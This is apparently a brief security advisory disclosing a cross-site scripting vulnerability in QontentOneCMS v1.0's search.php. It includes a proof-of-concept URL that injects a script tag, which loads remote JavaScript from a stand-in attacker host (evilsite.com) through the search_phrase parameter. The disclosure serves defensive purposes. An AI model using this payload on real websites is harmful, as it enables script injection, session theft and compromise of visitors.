<<< Date Index >>>     <<< Thread Index >>>

QontentOneCMS v1.0



QontentOneCMS v1.0

homepage:
http://www.qontentone.com/

Effected files:
search.php
input forms

XSS Proof of concept:

http://www.example.com/search.php?search_phrase=";><SCRIPT 
SRC=http://www.evilsite.com/xss.js></SCRIPT><"&search=Search